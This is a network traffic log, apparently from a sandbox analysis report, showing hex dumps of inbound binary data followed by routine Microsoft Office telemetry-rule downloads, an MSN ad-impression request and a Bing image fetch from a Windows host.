2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 0b 23 fc fe 73 7d e6 fd 68 ae f5 59 d3 5c aa 44 aa 10 fb 7b 9f 72 73 49 be 97 9a 39 ae a4 ee 79 c2 6f a6 6e f7 a6 d1 4c 91 d4 fd f5 15 11 b5 26 ae 34 3b 77 bd 1b bd e8 a6 d3 06 3b 77 bd 1b bd e9 bb a8 dd 53 ca 21 db bd e9 bb a9 af 45 50 0e a6 d3 37 d2 f3 49 bb 00 73 47 34 73 47 34 c0 39 a3 9a 8e 8a 00 1e 8a 6d 14 00 49 4d a2 8a 00 28 a2 8a 00 6f 34 9b e9 79 a4 92 80 0d f4 49 4c dd ef 46 ef 7a 00 28 a6 d1 40 05 12 51 fe dd 35 e8 00 dd fd fa 28 dd 44 7e 5d 00 33 7d 33 ef d3 e4 a6 50 01 45 1b bd e8 91 a8 00 7a 6e da 3f e5 b5 1b a8 28 77 fc b1 a6 d3 77 6c a1 28 24 75 1b 68 91 b6 53 64 6a 06 c2 9d 4d dd 4d e6 81 0e a2 99 be 8d f4 00 fa 29 9b e9 79 a0 6c 75 14 c9 29 79 a0 42 7f bf 43 b5 12 53 28 1b 1f be 99 45 14 05 c6 d3 b7 7b d4 6f 4e 8d 6a 84 1b a8 a3 fd ca Data Ascii: #s}hY\D{rsI9yonL&4;w;wS!EP7IsG4sG49mIM(o4yILFz(@Q5(D~]3}3PEzn?(wwl($uhSdjMM)ylu)yBCS(E{oNj
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 7c f3 5f ba ff 00 bb 44 69 d3 82 d0 e8 8c 65 b9 8d e2 6d 2a de ef c0 7a 6d af 86 3e d7 71 aa 5b cb fb b8 fe fa 5c 6e df b9 e4 ff 00 6a bb cf 85 3f 04 ac 2c 7c 27 ff 00 09 3f 8f e2 b5 b9 68 f6 62 ca 38 7f d4 3c 9f 77 73 74 7f 64 fc 6b a0 f8 65 a2 da 68 f3 79 29 67 69 65 05 c5 cc 36 f7 bf 69 97 ed 3f 68 b8 d8 65 93 f7 7d 11 7f 82 ba 6f 1c 79 11 4d a6 c1 a8 f9 31 df 47 22 5f de fd 9a 2d 90 c7 b7 fd 4c 09 b3 fd 87 ac fd b7 b4 9f 24 1f a9 a4 28 a5 ef 49 1c 1e 8f f1 2e 0f 0f eb 91 cf e1 ed 06 ee 3d 0f ec df bb b6 b9 fd cc 3f 2a 7f ac f9 3e fe ea 8b c4 7e 21 d2 7c 4b f6 e9 f5 7d 4a 19 27 d4 7f d2 e4 8e 29 7f e3 dd db ee 46 bb 7f e5 9a 7d da c4 f1 76 95 7f a8 68 77 29 a7 79 de 5c 7b fe d3 f6 6f 92 69 3f e9 92 ed ae 23 c4 50 6a d2 f8 4e e6 d7 45 fd dc 12 47 fb df Data Ascii: \|_Diemzm>q[\nj?,\|'?hb8<wstdkehy)gie6i?he}oyM1G"_-L$(I.=?>~!\|K}J')F}vhw)y\{oi?#PjNEG
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 25 43 b6 48 bc b7 78 66 aa 51 8b 44 ca 72 8b d4 d4 fb 67 d9 ed 24 7f f9 e9 56 3e d3 b3 fe b9 fc 95 8d 1d cc 8f 37 fa e8 7f 79 ff 00 3c aa d6 9b 14 97 72 ff 00 a9 fd fc 71 fe f2 4f bf 49 c1 13 ed 13 b2 45 df 3e 47 86 38 fc ef f5 95 27 db 36 7c 95 93 3a c9 fb b7 ff 00 bf 92 54 b2 2d db cd bd 21 9a 48 ff 00 e7 e7 f8 2a d5 28 d8 cd d7 69 e8 68 c1 73 25 c4 db 12 9f e7 cf 2c df 3f fa ca ce ba 6f 2b cb 7f df 79 92 7f cb 3f 2b f8 2a 7b 59 e7 97 f7 e9 e4 fe f3 fe 5a 4b 47 b2 44 fb 56 dd a4 ac 5d 8d e7 f3 a4 4a 9e 37 93 c9 de ff 00 f5 d2 aa e9 50 5f dd ea 11 ec 87 cc 93 fd 5c 9e 6f c9 fe ea d7 07 f1 63 e3 3f 85 fc 15 e2 69 7c 3d 6b a0 ff 00 c2 45 a9 5b ec f3 3c ab bf 26 da 39 7f e7 9e ee af ff 00 01 ac 31 15 28 e1 d5 e6 ce ac 2d 1a d8 c9 5a 84 6f de fa 1e 8d ba 44 Data Ascii: %CHxfQDrg$V>7y<rqOIE>G8'6\|:T-!H(ihs%,?o+y?+{YZKGDV]J7P_\oc?i\|=kE[<&91(-ZoD
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 26 ba 93 da e9 1b 3e 74 bc fb 44 9e 5b fe ee db fd fa 23 8a d3 4c fb 4e a3 a8 f9 3a 76 8f 6f 1f fa 4f db b7 fe f3 fd 85 ff 00 69 fd 2a c7 87 f5 3d 4a 2f f8 f5 b3 fb 45 d4 9f eb 64 b9 fd cf d9 d3 fe 99 be ea e2 3f 6a cb 9f b3 ea de 17 f0 f6 a9 79 77 26 a3 24 8f a9 dc fd c9 93 64 9f bb 87 e6 4f e2 ac b1 58 87 46 9c 9b b5 fa 5c df 2d c1 43 19 56 34 d3 95 b7 97 a0 ff 00 07 fc 77 4d 36 ef 52 4b af 07 da 69 da 3e a3 a7 5c c1 a4 fd 9b 7f da 64 ba fb b1 37 9c df 27 96 bf 79 eb ce 75 5b cd 6b 44 bb d3 60 f0 f6 b1 0c 9f 67 fb 35 fc 77 36 df 3c d6 ee b0 ff 00 17 f7 b6 ef f9 ab 23 58 f1 1d fd bc 37 2f 6b 67 0f 91 71 be 0b 2f 2e 2f f8 f7 f9 f6 ec f9 bf 5a bf 75 79 a6 e9 fe 09 bd d0 5e 18 6d e7 fb 33 db c9 73 6d f7 ee 3f da 91 ff 00 bb e9 1f dd af 9b a9 1a b3 9f 33 77 Data Ascii: &>tD[#LN:voOi*=J/Ed?jyw&$dOXF\-CV4wM6RKi>\d7'yu[kD`g5w6<#X7/kgq/./Zuy^m3sm?3w
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: c9 1b e7 ff 00 6b 77 4a cb 8f c5 53 be ad 73 a0 e9 da 3e 9f 65 63 24 7f bb 92 2f 91 e3 dd f7 5d dd 7f ef 9c 56 a6 a4 de 3b f1 45 a7 f6 a5 97 86 f4 9f b0 fc ff 00 f1 32 8b 49 86 14 df f7 a4 ff 00 58 d8 dd 56 ad 7c 39 69 a8 78 37 fb 47 5e f1 24 de 45 ec 73 79 72 d8 c4 9b 23 78 df e5 f3 b6 0f 9b 34 97 24 52 e6 dc b9 3a b3 4b d9 3d 16 bb 6f f7 95 64 f0 9e a5 77 a7 c4 97 ba 97 ee e3 8d ed e3 92 2d 9f f8 ea a7 fb 55 4b c4 d1 41 a7 f8 36 db 44 b2 fe d0 92 4f 93 ed 3f 69 95 d2 1d df c6 9b 5b e5 ab 52 2c 1a 3d dd b4 f6 be 24 d4 2f 20 b7 b2 87 fe 3d ae ff 00 d1 bc d5 fb 9b d3 8f ff 00 6a a6 92 d3 c5 17 7a b7 f6 be af a3 cd 71 75 1e fd 4f fd 26 5d 8f bd 76 2f ef 23 e3 7d 5a 72 93 57 7a 1c f5 3d 84 56 cd 37 a7 70 d3 65 d3 75 88 64 44 fe c9 d2 ae a3 d9 1d cf 9b 2a 5b Data Ascii: kwJSs>ec$/]V;E2IXV\|9ix7G^$Esyr#x4$R:K=odw-UKA6DO?i[R,=$/ =jzquO&]v/#}ZrWz=V7peudD*[
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 0b fe dd 3f c4 76 df 67 bc b6 83 51 fe d0 92 c7 4e 8f ec 96 5f e8 97 37 df 3b 27 cd ba e1 f7 2a be ef bc d1 c7 b9 7a 6e fe 1a ea 2e c0 d1 b4 0b 3d 07 c7 de 2a d5 62 b1 b6 d3 be df fd a3 ab 5a ec 7d 5a e1 7f 8b 6f dc 8e 14 ff 00 6a b8 df 05 f8 47 c1 1a c7 83 e3 f1 3c 1a ee 9f e2 eb ad 1a e7 cc fb 3c 5b d2 19 1d 9f e6 7f f9 65 0f fd f5 fe f1 ac 39 a5 ca 94 be 5f 33 57 04 e6 dc 56 e3 b5 28 3c ad 3e 3d 3a cb 47 86 e2 3f 31 ff 00 b2 7e dd 2f 9c ff 00 bb 4f 2d b7 79 8a cc 9f 37 f1 bf dd 5e 95 4f c3 be 32 f8 99 73 67 7d 1c 3e 2f d2 7e d5 a5 45 e5 db ea d1 dd a5 8e 8b e1 d6 fe 34 58 7f e5 f6 7d bd 1f e6 d9 f5 a7 78 8a db 4c f1 2d 9e b7 fd 9d e3 09 b4 5f 0c e9 56 5f 68 b9 b2 b1 89 3c e9 e2 64 ff 00 5b e6 ed 50 90 2f f0 61 7e 76 fb 9b ab 53 c4 de 2a fe c2 d5 b4 9f Data Ascii: ?vgQN_7;'zn.=bZ}ZojG<<[e9_3WV(<>=:G?1~/O-y7^O2sg}>/~E4X}xL-_V_h<d[P/a~vS*
2024-11-25 23:25:55 UTC	16067	IN	Data Raw: 4b b3 f3 ae 75 1b 88 92 e2 3b 68 a2 de f1 a6 cf 93 e6 fe 74 cd 4a d3 52 7f 10 58 cd a9 eb 11 5e 5f 69 5b 20 b7 d3 ad a2 ff 00 56 9f dc 4f 7a ec b5 2f 01 c1 ac 2f f6 b3 eb de 66 a9 e5 c2 9a 8f fc 4c 21 b3 b4 b7 59 3e e5 b2 ca cd f3 bf fc 06 b4 fa d5 28 d2 e6 6f 72 54 5c a6 ac 79 98 b4 92 5d 2b 7e a1 0c b2 7f a3 25 dc 71 ff 00 cf 4d af fe cf f0 ed ae f3 e1 4f 83 bc 75 f1 36 1b 64 b5 b3 d4 6d fc 31 f6 d8 74 cb 9b 98 b6 43 69 68 8f fe db 6d 1f ef 35 6b f8 2f e1 3e 85 ab 78 9e e7 4f d3 ff 00 b7 3f b2 b4 ab 67 92 f6 f6 3d 9b 2f 25 54 dc b0 c2 bf dd dd fc 4f 5d f7 c4 dd 4f 5a 4f 84 3e 1f f8 78 fa c6 87 a5 47 a7 47 f6 89 34 db 1f f4 9f 2d 23 f9 9a 4b 99 39 8d ae 25 7f e0 db f2 56 53 c5 27 0b 43 a9 d1 4e 84 d4 af 2e 87 4b 75 a7 f8 07 45 f0 cc 9e 10 d0 75 ed 42 f6 Data Ascii: Ku;htJRX^_i[ VOz//fL!Y>(orT\y]+~%qMOu6dm1tCihm5k/>xO?g=/%TO]OZO>xGG4-#K9%VS'CN.KuEuB
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 4d fe 62 2b fc eb fe fa d7 47 f0 83 f6 6a f1 2f 88 fc 3d 63 75 e3 ff 00 3b c2 1a 3f 99 e6 5b 47 2c 49 f6 eb b5 64 fe e7 fc b3 53 fe dd 67 5b 15 46 9a bc a4 28 50 a9 27 68 ad 4f 14 f0 7e 95 3e b7 1f fa 2e 91 a8 de dd 49 bf ec 56 56 50 bc cf b5 7e f7 eb 5e e5 f0 bf f6 56 d4 b5 5f 12 45 2f c4 69 6e b4 6f b6 46 92 5b 68 3a 6d d4 2f 7f 3e ef 99 7c dd df 2d be ef f6 ab d9 74 7b af 04 fc 15 d3 ff 00 e1 1e f0 f6 bd e1 9f 08 c1 71 ff 00 2c e5 d4 12 e7 51 91 f6 7f ac bb 78 bc c3 b7 f8 b6 fd ca cd ff 00 84 ff 00 5d bd f0 cd cc 17 5e 30 bb 8e 0b d9 1e e3 fb 5a c7 ec d6 d7 d7 76 eb ff 00 3e d1 c6 8d 33 ab 7f ba b5 e3 d7 cd 31 15 63 fb a5 cb 1e fd 4e aa 78 2a 50 97 34 9b 6c ed 7c 17 e1 af 09 fc 32 87 52 d2 3c 0d a0 e9 3e 15 f2 ee 7c bb dd 5b 52 df fb c4 5f e1 49 ae 33 Data Ascii: Mb+Gj/=cu;?[G,IdSg[F(P'hO~>.IVVP~^V_E/inoF[h:m/>\|-t{q,Qx]^0Zv>31cNx*P4l\|2R<>\|[R_I3
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: fa a3 fe b6 eb fd 55 63 53 7b 26 69 09 5d 26 d1 76 fa 47 7d 27 7b cb ff 00 2c ff 00 ef ba bf f0 b6 29 ee fc 4f 6c 96 df bb f2 e4 f3 3e d1 1f fc b3 7f e0 a8 20 5f b5 43 1a 4d 37 97 1d bc 6f ff 00 7c b5 4b e1 95 4b 0f 10 44 e4 f9 76 bf 69 f2 ee 3c b9 b6 79 88 bf 35 37 1f 7b 98 9a 56 51 77 47 b4 78 ef 41 b4 f1 16 b9 73 75 07 fc 4b b4 e8 ed 92 4b d8 ff 00 82 ee 56 fe e2 ff 00 b9 5a 9a 54 1a 6e 95 69 f6 5b 5b 3f b3 da f9 7f f7 f1 e3 4f e2 a3 e1 95 e4 1a 9f 80 f4 dd 2e f7 ec 96 f0 79 76 d6 9e 5f fc bd ef 67 ff 00 d9 9e a9 f8 e3 c7 1a 6f 86 ad 2e 5f 4e d3 61 bd 93 4e bd 7b 3b 9f 37 e4 4d 8b ff 00 3c da aa 32 4b 56 12 4d be 54 6c 78 8f 57 bf b2 f0 ce fb 5f 3b cb f2 ff 00 e7 96 cf 33 73 a7 dd ff 00 c7 eb cf 3e 21 2d da fd 9b 57 82 6f 32 fa de e5 ff 00 d0 be fa 7c Data Ascii: UcS{&i]&vG}'{,)Ol> _CM7o\|KKDvi<y57{VQwGxAsuKKVZTni[[?O.yv_go._NaN{;7M<2KVMTlxW_;3s>!-Wo2\|

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	49926	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:55 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:54 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232554Z-174f7845968zgtf6hC1EWRqd8s0000000mfg0000000008es x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:55 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.6	49928	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	265	OUT	POST /v3/Delivery/Events/Impression HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Content-Length: 1502 Content-Type: text/plain; charset=UTF-8 Host: arc.msn.com Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 23:25:54 UTC	1502	OUT	Data Raw: 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 54 49 44 3d 31 26 43 49 44 3d 31 32 38 30 30 30 30 30 30 30 30 31 36 31 35 36 30 39 26 42 49 44 3d 31 30 35 38 38 36 34 32 38 39 26 50 47 3d 50 43 30 30 30 50 30 46 52 35 2e 30 30 30 30 30 30 30 49 52 55 26 54 50 49 44 3d 34 32 36 30 38 31 35 34 32 26 52 45 51 41 53 49 44 3d 37 30 33 37 32 43 31 39 30 44 45 32 34 36 31 42 39 41 46 46 32 42 44 36 38 46 42 33 37 36 34 43 26 41 53 49 44 3d 34 61 61 33 35 62 34 38 65 63 33 36 34 32 62 66 38 33 35 65 39 64 65 65 39 65 35 36 64 63 37 61 26 54 49 4d 45 3d 32 30 32 34 31 31 32 35 54 32 33 32 35 34 30 5a 26 53 4c 4f 54 3d 31 26 52 45 51 54 3d 32 30 32 34 31 31 32 35 54 32 33 32 35 30 37 26 4d 41 5f 53 63 6f 72 65 3d 30 26 26 44 53 5f 45 56 54 49 44 3d 37 30 33 37 32 43 31 Data Ascii: PID=426081542&TID=1&CID=128000000001615609&BID=1058864289&PG=PC000P0FR5.0000000IRU&TPID=426081542&REQASID=70372C190DE2461B9AFF2BD68FB3764C&ASID=4aa35b48ec3642bf835e9dee9e56dc7a&TIME=20241125T232540Z&SLOT=1&REQT=20241125T232507&MA_Score=0&&DS_EVTID=70372C1
2024-11-25 23:25:55 UTC	394	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/xml; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	49929	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:55 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:55 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:55 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232555Z-174f7845968kdththC1EWRzvxn000000071g00000000016s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:55 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	49931	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:56 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:56 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: 8c2ab7fe-e01e-0003-5b91-3f0fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232556Z-174f7845968g6hv8hC1EWR1v2n00000002hg0000000002n7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:56 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	49932	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:56 UTC	522	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:56 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: fdde7aaa-d01e-0028-2a8c-3f7896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232556Z-174f7845968pf68xhC1EWRr4h80000000uyg0000000001n0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:56 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	49933	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:56 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:56 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232556Z-174f7845968cdxdrhC1EWRg0en0000000uk00000000006tc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:56 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.6	49935	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:56 UTC	346	OUT	GET /th?id=OADD2.10239381741591_1LPZQNFJIC0J01PB0&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:56 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 918153 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 02D206391E8543698F64CD8EB50ABC82 Ref B: EWR30EDGE0118 Ref C: 2024-11-25T23:25:56Z Date: Mon, 25 Nov 2024 23:25:56 GMT Connection: close
